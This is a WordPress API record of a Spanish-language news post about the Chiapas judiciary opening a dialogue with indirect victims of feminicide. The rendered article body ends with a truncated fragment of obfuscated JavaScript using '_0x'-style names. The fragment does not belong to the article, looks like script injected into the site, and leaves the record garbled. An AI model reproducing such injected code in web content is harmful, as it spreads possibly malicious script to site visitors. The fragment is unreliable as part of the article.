{"id":21082,"date":"2025-03-26T05:14:23","date_gmt":"2025-03-26T05:14:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21082"},"modified":"2025-03-26T05:14:24","modified_gmt":"2025-03-26T05:14:24","slug":"poder-judicial-de-chiapas-inicia-mesa-de-trabajo-con-victimas-indirectas-del-delito-de-feminicidio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21082","title":{"rendered":"Poder Judicial de Chiapas inicia mesa de trabajo con v\u00edctimas indirectas del delito de feminicidio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0069-1024x771.jpg\" alt=\"\" class=\"wp-image-21083\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0069-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0069-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0069-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0069-1536x1157.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0069-2048x1542.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>25 de marzo del 2025. Tuxtla Guti\u00e9rrez.- En el marco de la campa\u00f1a &#8220;La Justicia es la Paz&#8221;, el Poder Judicial del Estado inici\u00f3 una mesa de trabajo entre v\u00edctimas indirectas del delito de feminicidio y servidoras y servidores de esta casa de la justicia, proporcionando un espacio seguro y respetuoso para realizar esta actividad.<\/p>\n\n\n\n<p>Esta mesa de trabajo est\u00e1 dise\u00f1ada para promover un di\u00e1logo abierto y constructivo, permitiendo que las personas que han sido afectadas por este delito puedan expresar sus inquietudes y aportar opiniones y puntos de vista que contribuyan a una mejor administraci\u00f3n de justicia.<\/p>\n\n\n\n<p>El prop\u00f3sito de esta iniciativa es fortalecer la justicia con un sentido m\u00e1s humanista, y que las v\u00edctimas indirectas, as\u00ed como integrantes de colectivos y defensoras sociales, sean escuchadas, demostrando que en el Poder Judicial todas las voces chiapanecas son tomadas en cuenta.<\/p>\n\n\n\n<p>Con esta mesa de trabajo, el Poder Judicial del Estado reafirma su compromiso con la justicia, la equidad y el respeto a los derechos humanos, buscando generar un ambiente de confianza, transparencia y certeza en el sistema judicial.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 25 de marzo del 2025. Tuxtla Guti\u00e9rrez.- En el marco de la campa\u00f1a &#8220;La Justicia es la Paz&#8221;, el Poder Judicial del Estado inici\u00f3 una mesa de trabajo entre v\u00edctimas indirectas del delito de feminicidio y servidoras y servidores de esta casa de la justicia, proporcionando un espacio seguro y respetuoso para realizar esta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21083,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21082","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21082","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21082"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21082\/revisions"}],"predecessor-version":[{"id":21084,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21082\/revisions\/21084"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21083"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21082"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}